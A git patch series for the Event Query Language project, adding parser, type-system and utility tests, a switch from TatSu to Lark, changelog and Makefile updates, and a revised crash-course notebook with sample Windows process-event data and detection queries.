"process": {"a": {"b": "number", "c": "mixed"}, "d": "string", "event_type": "string"}, + "file": {"a": "string", "cd": ["number", "string"], "event_type": "string"}, + } + schema = Schema.learn(Event.from_data(d) for d in data) + self.assertDictEqual(schema.schema, event_schema) + self.assertFalse(schema.allow_generic) + + schema = Schema.learn([Event("generic", 0, {"a": "b"})]) + self.assertDictEqual(schema.schema, {"generic": {"a": "string"}}) + self.assertTrue(schema.allow_generic) diff --git a/tests/test_type_system.py b/tests/test_type_system.py new file mode 100644 index 0000000..2dd3cd3 --- /dev/null +++ b/tests/test_type_system.py 
@@ -0,0 +1,117 @@ +"""Test case.""" +import unittest + +from eql.errors import EqlTypeMismatchError +from eql.parser import parse_expression +from eql.types import * # noqa + + +class TestTypeSystem(unittest.TestCase): + """Test that the type system correctly validates types.""" + + def test_specifier_checks(self): + """Test that specifiers are properly compared.""" + expected = [ + # Full truth table + (DYNAMIC_SPECIFIER, NO_SPECIFIER, False), + (DYNAMIC_SPECIFIER, LITERAL_SPECIFIER, False), + (DYNAMIC_SPECIFIER, DYNAMIC_SPECIFIER, True), + + (LITERAL_SPECIFIER, NO_SPECIFIER, False), + (LITERAL_SPECIFIER, LITERAL_SPECIFIER, True), + (LITERAL_SPECIFIER, DYNAMIC_SPECIFIER, False), + + (NO_SPECIFIER, DYNAMIC_SPECIFIER, True), + (NO_SPECIFIER, LITERAL_SPECIFIER, True), + ] + + for spec1, spec2, rv in expected: + self.assertEqual(check_specifiers(spec1, spec2), rv, "specifier {} x {} != {}".format(spec1, spec2, rv)) + + def test_type_checks(self): + """Test that types are properly compared.""" + tests = [ + (BASE_STRING, BASE_STRING, True), + (BASE_STRING, BASE_BOOLEAN, False), + (BASE_NUMBER, BASE_STRING, False), + + # anything could potentially be null + (BASE_NULL, BASE_NUMBER, False), + (BASE_STRING, BASE_NULL, False), + (BASE_NULL, BASE_NULL, True), + + # test out unions + (BASE_STRING, (BASE_NUMBER, BASE_NULL), False), + ((BASE_STRING, (BASE_NUMBER, (BASE_STRING, BASE_BOOLEAN))), BASE_NULL, False), + ((BASE_STRING, (BASE_NUMBER, (BASE_STRING, BASE_BOOLEAN))), BASE_BOOLEAN, True), + (BASE_ALL, BASE_STRING, True), + (BASE_STRING, BASE_STRING, True), + (BASE_PRIMITIVES, BASE_STRING, True), + ((BASE_NUMBER, BASE_STRING), BASE_BOOLEAN, False), + ((BASE_NUMBER, (BASE_PRIMITIVES, ), BASE_BOOLEAN), BASE_BOOLEAN, True) + ] + + for hint1, hint2, expected in tests: + output = check_types(hint1, hint2) + self.assertEqual(output, expected, "hint {} x {} != {}".format(hint1, hint2, expected)) + + def test_parse_type_matches(self): + """Check that improperly compared types are 
raising errors.""" + expected_type_match = [ + '1 or 2', + 'abc == null or def == null', + "false or 1", + "1 or 'abcdefg'", + "false or 'string-false'", + "port == 80 or command_line == 'defghi'", + "(port != null or command_line != null)", + "(process_path or process_name) == '*net.exe'", + "'hello' < 'hELLO'", + "1 < 2", + "(data and data.alert_details and data.alert_details.process_path) == 'net.exe'", + ] + + for expression in expected_type_match: + parse_expression(expression) + + def test_parse_type_mismatches(self): + """Check that improperly compared types are raising errors.""" + expected_type_mismatch = [ + '1 == "*"', + 'false = 1', + '100 = "a"', + '100 != "*abcdef*"', + '100 in ("string1", "string2")', + 'true != 100', + '100 != "abc"', + '"some string" == null', + 'true < false', + 'true > "abc"', + 'field < true', + 'true <= 6', + "'hello' > 500", + # no longer invalid + # "concat(1, 2, null)", + + # check for return types + 'true == length(abc)', + '"true" == length(abc)', + + # check for mixed sets + "'rundll' in (1, 2, 3, abc.def[100], 'RUNDLL', false)", + "not 'rundll' in (1, 2, 3, '100', 'nothing', false)", + ] + + for expression in expected_type_mismatch: + self.assertRaises(EqlTypeMismatchError, parse_expression, expression) + + def test_invalid_function_signature(self): + """Check that function signatures are correct.""" + expected_type_mismatch = [ + "length(0)", + "wildcard(abc, def)", + "length(f) > 'def'", + ] + + for expression in expected_type_mismatch: + self.assertRaises(EqlTypeMismatchError, parse_expression, expression) diff --git a/tests/test_utils.py b/tests/test_utils.py index 409f653..556dcc7 100644 --- a/tests/test_utils.py +++ b/tests/test_utils.py @@ -4,6 +4,8 @@ import unittest import eql.utils +from eql.parser import parse_query, parse_expression, EqlParseError +from eql.utils import is_stateful, match_kv class TestUtils(unittest.TestCase): 
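Review bot: The docstring on test_parse_type_matches, `"""Check that improperly compared types are raising errors."""`, is copied from test_parse_type_mismatches and says the opposite of what the test does — it only calls parse_expression on expressions that must parse cleanly; `"""Check that compatible types parse without a type error."""` would be accurate. `from eql.types import *  # noqa` also hides that the module relies on `check_specifiers`, `check_types` and the BASE_* and *_SPECIFIER constants; an explicit import list keeps the linter's undefined-name check useful. The commented-out `# "concat(1, 2, null)"` under `# no longer invalid` would be better moved into the expected_type_match list of test_parse_type_matches as a positive case, so the changed behaviour is actually asserted rather than just noted.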
@@ -41,3 +43,102 @@ def test_stream_jsonl(self): jsonl = '\n'.join(json.dumps(item) for item in example) parsed = list(eql.utils.stream_json_lines(jsonl.splitlines())) self.assertEqual(parsed, example, "JSON lines didn't stream properly.") + + def test_stateful_checks(self): + """Check that :func:`~utils.is_stateful` is identifying stateful queries.""" + stateful_queries = [ + "sequence [process where process_name='net.exe'] [process where process_name='net.exe']", + "join [process where process_name='net.exe'] [process where process_name='net.exe']", + "file where file_name='*.txt' and descendant of [process where pid=4]", + "file where child of [process where pid=4]", + "registry where event of [process where pid=4]", + "process where true | unique_count process_name | filter count < 5", + "any where true | count user_name", + ] + + for query in stateful_queries: + ast = parse_query(query) + self.assertTrue(is_stateful(ast), "{} was not recognized as stateful".format(query)) + + def test_stateless_checks(self): + """Check that :func:`~utils.is_stateful` is identifying stateless queries.""" + stateless_queries = [ + "process where true | filter command_line='* https://*' | tail 10", + "process where user_name='system' | unique parent_process_name | head 500", + "file where file_name='*.txt' and (process_name='cmd.exe' or parent_process_name='net.exe')", + "registry where length(user_name) == 500", + "network where string(destination_port) == '500' | unique process_name", + ] + + for query in stateless_queries: + ast = parse_query(query) + self.assertFalse(is_stateful(ast), "{} was not recognized as stateless".format(query)) + + def test_match_kv(self): + """Check that :func:~utils.match_kv~ returns the expected EQL expressions.""" + def assert_kv_match(condition_dict, condition_text, *args): + """Helper function for validation.""" + condition_node = match_kv(condition_dict) + parsed_node = parse_expression(condition_text) + print(condition_node) + 
print(parsed_node) + self.assertEquals(condition_node.render(), parsed_node.render(), *args) + + assert_kv_match({"name": "net.exe"}, + r"name == 'net.exe'", + "Simple KV match") + + assert_kv_match({"name": ["net.exe"]}, + r"name == 'net.exe'", + "Single list match") + + assert_kv_match({"path": ["C:\\windows\\system32\\net.exe"]}, + r"path == 'C:\\windows\\system32\\net.exe'", + "String escaping") + + assert_kv_match({"path": ["C:\\windows\\system32\\net*.exe", "C:\\windows\\*\\cmd.exe"]}, + r"wildcard(path, 'C:\\windows\\system32\\net*.exe', 'C:\\windows\\*\\cmd.exe')", + "Multiple wildcards") + + assert_kv_match({"nested[0].name.test": ["net.exe"]}, + r"nested[0].name.test == 'net.exe'", + "Nested field check") + + assert_kv_match({"name": ["net.exe", "net1.exe"]}, + r"name in ('net.exe', 'net1.exe')", + "Multiple values in list") + + assert_kv_match({"name": ["net.exe", "net1.exe"], "pid": 4}, + r"name in ('net.exe', 'net1.exe') and pid == 4", + "Multiple fields checked") + + assert_kv_match({"completed": True, "delta": [8.2, 8.4]}, + r"completed == true and delta in (8.2, 8.4)", + "Booleans and floats") + + assert_kv_match({"name": ["net.exe", "net1.exe", "cmd*.exe"], "pid": [4]}, + r"(name in ('net.exe', 'net1.exe') or name == 'cmd*.exe') and pid == 4", + "Complex query") + + # Test for nested fields + assert_kv_match({"events[0].process_path": "c:\\windows\\explorer.exe", + "events[1].file_name": "test.docx"}, + r"events[0].process_path == 'c:\\windows\\explorer.exe' and events[1].file_name == 'test.docx'", + "Nested fields") + + assert_kv_match({"triggering_fact_array[0].data_buffer.process_path": "c:\\windows\\explorer.exe"}, + r"triggering_fact_array[0].data_buffer.process_path == 'c:\\windows\\explorer.exe'") + + assert_kv_match({}, "true", "Empty dict") + assert_kv_match({"empty": []}, "false", "Empty list of values") + + def test_match_kv_errors(self): + """Test that KV matching raises errors when expected.""" + self.assertRaises(EqlParseError, 
match_kv, {"invalid^field&syntax": "abc"}) + self.assertRaises(TypeError, match_kv, {"100": "invalid field"}) + + # Test that the parameters are validated + self.assertRaises(TypeError, match_kv, {"process_name": ["a", tuple()]}) + self.assertRaises(TypeError, match_kv, []) + self.assertRaises(TypeError, match_kv, True) + self.assertRaises(TypeError, match_kv, 1) From 845a8726c6f22aa6c77409089340dc706cecdb7d Mon Sep 17 00:00:00 2001 From: itsnotapt <3096198+itsnotapt@users.noreply.github.com> Date: Sat, 19 Oct 2019 00:12:28 +0100 Subject: [PATCH 09/13] Fixed doco to use wildcard function --- docs/query-guide/pipes.rst | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/query-guide/pipes.rst b/docs/query-guide/pipes.rst index c664a7c..42241cb 100644 --- a/docs/query-guide/pipes.rst +++ b/docs/query-guide/pipes.rst @@ -141,7 +141,7 @@ Find suspicious recon commands that were executed within a 5 minute window Find processes that have network connections to a single host with over 100 unique ports within a 10 second window .. code-block:: eql - network where destination_address in ("10.*", "172.*", "192.*") + network where wildcard(destination_address, "10.*", "172.*", "192.*") | window 10s | unique_count process_name, destination_port | filter count >= 100 From 110bbbd358a8c510295c9a3a8c35a1b8d348d5b0 Mon Sep 17 00:00:00 2001 From: Carl Rutherford Date: Sun, 20 Oct 2019 23:04:20 +0100 Subject: [PATCH 10/13] Removed extra time_unit in pipe_argument --- eql/etc/eql.ebnf | 1 - 1 file changed, 1 deletion(-) diff --git a/eql/etc/eql.ebnf b/eql/etc/eql.ebnf index 40734a2..c3186d1 100644 --- a/eql/etc/eql.ebnf +++ b/eql/etc/eql.ebnf @@ -26,7 +26,6 @@ pipe_command::Pipe pipe_arguments = - | @+:time_unit | &(atom atom) {atom} | expressions | {} From f62ff952c75b21bf09858f9b1e81632fcb080ca7 Mon Sep 17 00:00:00 2001 
From: Carl Rutherford Date: Tue, 4 Feb 2020 14:19:42 +0000 Subject: [PATCH 11/13] Merge changes from EQL 8.0. --- .github/PULL_REQUEST_TEMPLATE.md | 1 - CHANGELOG.md | 33 +- Makefile | 26 +- README.md | 3 +- docs/_static/eql-crash-course.ipynb | 325 ++++------ docs/index.rst | 2 +- docs/links.rst | 4 +- docs/query-guide/basic-syntax.rst | 17 +- docs/query-guide/functions.rst | 158 ++++- docs/query-guide/grammar.rst | 6 +- docs/query-guide/implementation.rst | 2 +- docs/query-guide/pipes.rst | 10 +- docs/query-guide/sequences.rst | 3 +- docs/resources.rst | 15 +- eql/__init__.py | 6 +- eql/ast.py | 113 +++- eql/build.py | 12 +- eql/engine.py | 17 +- eql/etc/test_data.json | 2 +- eql/etc/test_queries.toml | 529 ++++++++++------ eql/functions.py | 259 +++++++- eql/highlighters.py | 2 +- eql/parser.py | 936 +++++++++++++++++----------- eql/pipes.py | 12 +- eql/shell.py | 26 +- eql/tests/base.py | 13 +- eql/utils.py | 24 +- eql/walkers.py | 10 +- requirements.txt | 2 +- setup.py | 2 +- tests/test_optimizations.py | 10 + tests/test_parser.py | 74 ++- tests/test_python_engine.py | 27 +- tests/test_schema.py | 14 +- tests/test_utils.py | 66 +- 35 files changed, 1864 insertions(+), 897 deletions(-) diff --git a/.github/PULL_REQUEST_TEMPLATE.md b/.github/PULL_REQUEST_TEMPLATE.md index e898b96..268ee7d 100644 --- a/.github/PULL_REQUEST_TEMPLATE.md +++ b/.github/PULL_REQUEST_TEMPLATE.md @@ -1,5 +1,4 @@ - ## Issues ## Details diff --git a/CHANGELOG.md b/CHANGELOG.md index a5a1acc..6c6fc94 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md 
@@ -1,6 +1,37 @@ # Event Query Language - Changelog The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/). + +## Version 0.8.2 +_Released 2020-01-13_ + +### Fixed +* Restored missing text from semantic error messages + +## Version 0.8.1 +_Released 2020-01-09_ + +### Fixed +* Correctly load definitions/schema with `eql.build.get_engine` + +## Version 0.8 +_Released 2019-11-01_ + +### Added +* Method syntax +* Mathematical operators `+`, `-`, `*`, `/`, `%` +* Documentation for `match()` function +* `between()` function for extracting the first substring between two strings +* `cidrMatch()` function and several helper methods for subnet matching and regex building +* `extract_query_terms` to extract the original text for each event in a query + +### Changed +* Parser from TatSu to Lark + +### Fixed +* Examples for sequences in the Implementation Details page +* Compatibility for `eql shell` with Python 2.7 + ## Version 0.7 _Released 2019-07-24_ @@ -53,7 +84,7 @@ _Released 2018-12-13_ ## Version 0.6.1 _Released 2019-12-05_ -## Added +### Added * Support for gzipped files ## Version 0.6 diff --git a/Makefile b/Makefile index 2a7c415..c34746c 100644 --- a/Makefile +++ b/Makefile @@ -7,9 +7,6 @@ VENV_BIN := $(VENV)/bin PYTHON := $(VENV_BIN)/python PIP := $(PYTHON) -m pip SPHINXBUILD ?= $(VENV_BIN)/sphinx-build -VERSION ?= - -PARSER_FILE := eql/_parsergen.py $(VENV): @@ -19,16 +16,9 @@ $(VENV): $(PIP) install setuptools -U -$(PARSER_FILE): $(VENV) - $(PYTHON) -m tatsu eql/etc/eql.ebnf -o $(PARSER_FILE) - -.PHONY: parser -parser: $(PARSER_FILE) - - .PHONY: clean clean: - rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox *.egg-info .coverage coverage.xml junit.xml .pytest_cache $(PARSER_FILE) + rm -rf $(VENV) *.egg-info .eggs *.egg htmlcov build dist .build .tmp .tox *.egg-info .coverage coverage.xml junit.xml .pytest_cache find . -type f -name '*.pyc' -delete find . -type f -name '__pycache__' -delete 
@@ -37,12 +27,12 @@ testdeps: $(PIP) install -r requirements_test.txt .PHONY: pytest -pytest: $(VENV) parser testdeps +pytest: $(VENV) testdeps $(PYTHON) setup.py -q test .PHONY: pylint -pylint: $(VENV) parser testdeps +pylint: $(VENV) testdeps $(PYTHON) setup.py -q lint @@ -51,22 +41,22 @@ test: $(VENV) pylint pytest .PHONY: sdist -sdist: $(VENV) parser +sdist: $(VENV) $(PYTHON) setup.py sdist .PHONY: bdist_egg -bdist_egg: $(VENV) parser +bdist_egg: $(VENV) $(PYTHON) setup.py bdist_egg .PHONY: bdist_wheel -bdist_wheel: $(VENV) parser +bdist_wheel: $(VENV) $(PYTHON) setup.py bdist_wheel .PHONY: install -install: $(VENV) parser +install: $(VENV) $(PYTHON) setup.py install .PHONY: all @@ -81,4 +71,4 @@ docs: $(VENV) install .PHONY: upload upload: $(VENV) $(PIP) install twine~=1.13 - $(VENV_BIN)/twine upload dist/* + $(VENV_BIN)/twine upload dist/* diff --git a/README.md b/README.md index cd0a0f7..fa03472 100644 --- a/README.md +++ b/README.md @@ -2,6 +2,7 @@ [![PyPI](https://img.shields.io/pypi/v/eql.svg)](https://pypi.python.org/pypi/eql) [![Gitter](https://badges.gitter.im/eventquerylang/community.svg)](https://gitter.im/eventquerylang/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge) [![Documentation](https://readthedocs.org/projects/eql/badge/?version=latest)](https://eql.readthedocs.io/en/latest/?badge=latest) +[![License: AGPL v3](https://img.shields.io/badge/License-AGPL%20v3-blue.svg)](https://www.gnu.org/licenses/agpl-3.0) [![Twitter Follow](https://img.shields.io/twitter/follow/eventquerylang.svg?style=social)](https://twitter.com/eventquerylang) @@ -20,7 +21,7 @@ If Python is configured and already in the PATH, then ``eql`` will be readily av ```console $ eql --version -eql 0.7.0 +eql 0.8 ``` From there, try a [sample json file](docs/_static/example.json) and test it with EQL. diff --git a/docs/_static/eql-crash-course.ipynb b/docs/_static/eql-crash-course.ipynb index 8988d39..72e1418 100755 --- a/docs/_static/eql-crash-course.ipynb 
+++ b/docs/_static/eql-crash-course.ipynb @@ -10,7 +10,7 @@ "source": [ "# Event Query Language\n", "\n", - "Atomic Friday with Endgame 1/11/2018\n", + "Atomic Friday with Endgame 2019/01/11 (updated 2020/01/09)\n", "\n", "[@eventquerylang](https://twitter.com/eventquerylang)\n", "\n", 
@@ -28,17 +28,28 @@ "## Getting Started\n", "https://eql.readthedocs.io/en/latest/index.html#getting-started\n", "\n", - "Requires Python (confirmed with 2.7 and 3.5+)\n", + "Requires Python 3\n", "\n", "```console\n", - "$ pip install eql\n", - "\n", "Collecting eql\n", - " Using cached https://files.pythonhosted.org/packages/16/97/2a9bd7f3f2db2cc7889b01046d7d98568f46ad76721f96ff9b5ca7ef084f/eql-0.6.2-py2.py3-none-any.whl\n", - "Requirement already satisfied: PyYAML~=3.13 in c:\\programdata\\anaconda2\\lib\\site-packages (from eql) (3.13)\n", - "Requirement already satisfied: TatSu~=4.2.6 in c:\\programdata\\anaconda2\\lib\\site-packages (from eql) (4.2.6)\n", - "Installing collected packages: eql\n", - "Successfully installed eql-0.6.2\n", + " Downloading https://files.pythonhosted.org/packages/7d/a4/ac5560153f2ee4ed967250198c9cc39e6d6ad938db0ff8600dcb4716598e/eql-0.8.1-py2.py3-none-any.whl (96kB)\n", + " |████████████████████████████████| 102kB 457kB/s\n", + "Collecting lark-parser~=0.7 (from eql)\n", + " Downloading https://files.pythonhosted.org/packages/34/b8/aa7d6cf2d5efdd2fcd85cf39b33584fe12a0f7086ed451176ceb7fb510eb/lark-parser-0.7.8.tar.gz (276kB)\n", + " |████████████████████████████████| 276kB 669kB/s\n", + "Building wheels for collected packages: lark-parser\n", + " Building wheel for lark-parser (setup.py) ... 
done\n", + " Created wheel for lark-parser: filename=lark_parser-0.7.8-py2.py3-none-any.whl size=62516 sha256=0d431f442b57b113b6afa1d638a86a5c06f6f0d5b112fb3af117ff335e6c6fb7\n", + " Stored in directory: /private/var/folders/_v/l0j01qy91mbdb7z2yf4jxny40000gq/T/pip-ephem-wheel-cache-hjzs7nda/wheels/01/a2/30/ebae6ffa73cf3aa1c972a24d4c78388afd910f91e43bf554aa\n", + "Successfully built lark-parser\n", + "Installing collected packages: lark-parser, eql\n", + " Found existing installation: lark-parser 0.7.8\n", + " Uninstalling lark-parser-0.7.8:\n", + " Successfully uninstalled lark-parser-0.7.8\n", + " Found existing installation: eql 0.8.0\n", + " Uninstalling eql-0.8.0:\n", + " Successfully uninstalled eql-0.8.0\n", + "Successfully installed eql-0.8.1 lark-parser-0.7.8\n", "```\n", "\n", "Read more [next steps](https://eql.readthedocs.io/en/latest/query-guide/basic-syntax.html) to get running and see the [guide](https://eql.readthedocs.io/en/latest/query-guide/basic-syntax.html) for writing queries" @@ -58,18 +69,15 @@ "```json\n", "{\n", " \"command_line\": \"C:\\\\Windows\\\\Explorer.EXE\",\n", - " \"event_subtype_full\": \"already_running\",\n", - " \"event_type_full\": \"process_event\",\n", + " \"event_type\": \"process\",\n", " \"md5\": \"ac4c51eb24aa95b77f705ab159189e24\",\n", - " \"opcode\": 3,\n", " \"pid\": 2460,\n", " \"ppid\": 3052,\n", " \"process_name\": \"explorer.exe\",\n", " \"process_path\": \"C:\\\\Windows\\\\explorer.exe\",\n", - " \"serial_event_id\": 34,\n", + " \"subtype\": \"create\",\n", " \"timestamp\": 131485997150000000,\n", - " \"unique_pid\": 34,\n", - " \"unique_ppid\": 0,\n", + " \"user\": \"research\\\\researcher\",\n", " \"user_domain\": \"research\",\n", " \"user_name\": \"researcher\"\n", "}\n", 
@@ -90,7 +98,7 @@ "# but this is one way to hook it up to a jupyter notebook for showing results as tables\n", "\n", "from pandas import DataFrame\n", - "from eql.engines.build import get_engine\n", + "from eql.build import get_engine\n", "from eql.utils import stream_file_events\n", "import numpy\n", "\n", @@ -150,20 +158,17 @@ " \n", " \n", " command_line\n", - " event_subtype_full\n", - " event_type_full\n", + " event_type\n", " md5\n", - " opcode\n", " parent_process_name\n", " parent_process_path\n", " pid\n", " ppid\n", " process_name\n", " process_path\n", - " serial_event_id\n", + " subtype\n", " timestamp\n", - " unique_pid\n", - " unique_ppid\n", + " user\n", " user_domain\n", " user_name\n", " \n", 
@@ -172,140 +177,119 @@ " \n", " 0\n", " \n", - " already_running\n", - " process_event\n", + " process\n", " \n", - " 3\n", " System Idle Process\n", " \n", " 4\n", " \n", " System\n", " \n", - " 2\n", + " create\n", " 131485996510000000\n", - " 2\n", - " 1\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 1\n", " wininit.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 94355c28c1970635a31b3fe52eb7ceba\n", - " 3\n", " \n", " \n", " 424\n", " 364\n", " wininit.exe\n", " C:\\Windows\\System32\\wininit.exe\n", - " 5\n", + " create\n", " 131485996510000000\n", - " 5\n", - " 0\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 2\n", " winlogon.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 1151b1baa6f350b1db6598e0fea7c457\n", - " 3\n", " \n", " \n", " 472\n", " 416\n", " winlogon.exe\n", " C:\\Windows\\System32\\winlogon.exe\n", - " 7\n", + " create\n", " 131485996510000000\n", - " 7\n", - " 0\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 3\n", " C:\\Windows\\system32\\services.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 24acb7e5be595468e3b9aa488b9b4fcb\n", - " 3\n", " wininit.exe\n", " C:\\Windows\\System32\\wininit.exe\n", " 524\n", " 424\n", " services.exe\n", " C:\\Windows\\System32\\services.exe\n", - " 8\n", + " create\n", " 131485996520000000\n", - " 8\n", - " 5\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 4\n", " C:\\Windows\\system32\\lsass.exe\n", - " already_running\n", - " process_event\n", + " process\n", " 7554a1b82b4a222fd4cc292abd38a558\n", - " 3\n", " wininit.exe\n", " C:\\Windows\\System32\\wininit.exe\n", " 536\n", " 424\n", " lsass.exe\n", " C:\\Windows\\System32\\lsass.exe\n", - " 9\n", + " create\n", " 131485996520000000\n", - " 9\n", - " 5\n", + " NT AUTHORITY\\SYSTEM\n", " NT AUTHORITY\n", " SYSTEM\n", " \n", " \n", " 5\n", " 
C:\\Windows\\Explorer.EXE\n", - " already_running\n", - " process_event\n", + " process\n", " ac4c51eb24aa95b77f705ab159189e24\n", - " 3\n", " \n", " \n", " 2460\n", " 3052\n", " explorer.exe\n", " C:\\Windows\\explorer.exe\n", - " 34\n", + " create\n", " 131485997150000000\n", - " 34\n", - " 0\n", + " research\\researcher\n", " research\n", " researcher\n", " \n", " \n", " 6\n", " \"C:\\Windows\\system32\\cmd.exe\"\n", - " already_running\n", - " process_event\n", + " process\n", " 5746bd7e255dd6a8afa06f7c42c1ba41\n", - " 3\n", " explorer.exe\n", " C:\\Windows\\explorer.exe\n", " 2864\n", " 2460\n", " cmd.exe\n", " C:\\Windows\\System32\\cmd.exe\n", - " 39\n", + " create\n", " 131491838190000000\n", - " 39\n", - " 34\n", + " research\\researcher\n", " research\n", " researcher\n", " \n", 
@@ -314,23 +298,23 @@ "" ], "text/plain": [ - " command_line event_subtype_full event_type_full \\\n", - "0 already_running process_event \n", - "1 wininit.exe already_running process_event \n", - "2 winlogon.exe already_running process_event \n", - "3 C:\\Windows\\system32\\services.exe already_running process_event \n", - "4 C:\\Windows\\system32\\lsass.exe already_running process_event \n", - "5 C:\\Windows\\Explorer.EXE already_running process_event \n", - "6 \"C:\\Windows\\system32\\cmd.exe\" already_running process_event \n", - "\n", - " md5 opcode parent_process_name \\\n", - "0 3 System Idle Process \n", - "1 94355c28c1970635a31b3fe52eb7ceba 3 \n", - "2 1151b1baa6f350b1db6598e0fea7c457 3 \n", - "3 24acb7e5be595468e3b9aa488b9b4fcb 3 wininit.exe \n", - "4 7554a1b82b4a222fd4cc292abd38a558 3 wininit.exe \n", - "5 ac4c51eb24aa95b77f705ab159189e24 3 \n", - "6 5746bd7e255dd6a8afa06f7c42c1ba41 3 explorer.exe \n", + " command_line event_type \\\n", + "0 process \n", + "1 wininit.exe process \n", + "2 winlogon.exe process \n", + "3 C:\\Windows\\system32\\services.exe process \n", + "4 C:\\Windows\\system32\\lsass.exe process \n", + "5 C:\\Windows\\Explorer.EXE process \n", + "6 \"C:\\Windows\\system32\\cmd.exe\" process \n", + "\n", + " md5 parent_process_name \\\n", + "0 System Idle Process \n", + "1 94355c28c1970635a31b3fe52eb7ceba \n", + "2 1151b1baa6f350b1db6598e0fea7c457 \n", + "3 24acb7e5be595468e3b9aa488b9b4fcb wininit.exe \n", + "4 7554a1b82b4a222fd4cc292abd38a558 wininit.exe \n", + "5 ac4c51eb24aa95b77f705ab159189e24 \n", + "6 5746bd7e255dd6a8afa06f7c42c1ba41 explorer.exe \n", "\n", " parent_process_path pid ppid process_name \\\n", "0 4 System \n", 
@@ -341,23 +325,23 @@ "5 2460 3052 explorer.exe \n", "6 C:\\Windows\\explorer.exe 2864 2460 cmd.exe \n", "\n", - " process_path serial_event_id timestamp \\\n", - "0 2 131485996510000000 \n", - "1 C:\\Windows\\System32\\wininit.exe 5 131485996510000000 \n", - "2 C:\\Windows\\System32\\winlogon.exe 7 131485996510000000 \n", - "3 C:\\Windows\\System32\\services.exe 8 131485996520000000 \n", - "4 C:\\Windows\\System32\\lsass.exe 9 131485996520000000 \n", - "5 C:\\Windows\\explorer.exe 34 131485997150000000 \n", - "6 C:\\Windows\\System32\\cmd.exe 39 131491838190000000 \n", - "\n", - " unique_pid unique_ppid user_domain user_name \n", - "0 2 1 NT AUTHORITY SYSTEM \n", - "1 5 0 NT AUTHORITY SYSTEM \n", - "2 7 0 NT AUTHORITY SYSTEM \n", - "3 8 5 NT AUTHORITY SYSTEM \n", - "4 9 5 NT AUTHORITY SYSTEM \n", - "5 34 0 research researcher \n", - "6 39 34 research researcher " + " process_path subtype timestamp \\\n", + "0 create 131485996510000000 \n", + "1 C:\\Windows\\System32\\wininit.exe create 131485996510000000 \n", + "2 C:\\Windows\\System32\\winlogon.exe create 131485996510000000 \n", + "3 C:\\Windows\\System32\\services.exe create 131485996520000000 \n", + "4 C:\\Windows\\System32\\lsass.exe create 131485996520000000 \n", + "5 C:\\Windows\\explorer.exe create 131485997150000000 \n", + "6 C:\\Windows\\System32\\cmd.exe create 131491838190000000 \n", + "\n", + " user user_domain user_name \n", + "0 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "1 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "2 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "3 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "4 NT AUTHORITY\\SYSTEM NT AUTHORITY SYSTEM \n", + "5 research\\researcher research researcher \n", + "6 research\\researcher research researcher " ] }, "execution_count": 2, 
@@ -414,18 +398,15 @@ " \n", " \n", " command_line\n", - " event_subtype_full\n", - " event_type_full\n", + " event_type\n", " md5\n", - " opcode\n", " pid\n", " ppid\n", " process_name\n", " process_path\n", - " serial_event_id\n", + " subtype\n", " timestamp\n", - " unique_pid\n", - " unique_ppid\n", + " user\n", " user_domain\n", " user_name\n", " \n", @@ -434,18 +415,15 @@ " \n", " 0\n", " C:\\Windows\\Explorer.EXE\n", - " already_running\n", - " process_event\n", + " process\n", " ac4c51eb24aa95b77f705ab159189e24\n", - " 3\n", " 2460\n", " 3052\n", " explorer.exe\n", " C:\\Windows\\explorer.exe\n", - " 34\n", + " create\n", " 131485997150000000\n", - " 34\n", - " 0\n", + " research\\researcher\n", " research\n", " researcher\n", " \n", @@ -454,17 +432,14 @@ "" ], "text/plain": [ - " command_line event_subtype_full event_type_full \\\n", - "0 C:\\Windows\\Explorer.EXE already_running process_event \n", - "\n", - " md5 opcode pid ppid process_name \\\n", - "0 ac4c51eb24aa95b77f705ab159189e24 3 2460 3052 explorer.exe \n", + " command_line event_type md5 pid \\\n", + "0 C:\\Windows\\Explorer.EXE process ac4c51eb24aa95b77f705ab159189e24 2460 \n", "\n", - " process_path serial_event_id timestamp unique_pid \\\n", - "0 C:\\Windows\\explorer.exe 34 131485997150000000 34 \n", + " ppid process_name process_path subtype timestamp \\\n", + "0 3052 explorer.exe C:\\Windows\\explorer.exe create 131485997150000000 \n", "\n", - " unique_ppid user_domain user_name \n", - "0 0 research researcher " + " user user_domain user_name \n", + "0 research\\researcher research researcher " ] }, "execution_count": 3, @@ -953,7 +928,7 @@ ], "source": [ "results = eql_search(\"data/normalized-T1117-AtomicRed-regsvr32.json\",\n", - " \"process where subtype='create' and process_name = 'regsvr32.exe'\")\n", + " \"process where subtype='create' and process_name = 'regsvr32.exe'\")\n", "results[['command_line']]" ] }, 
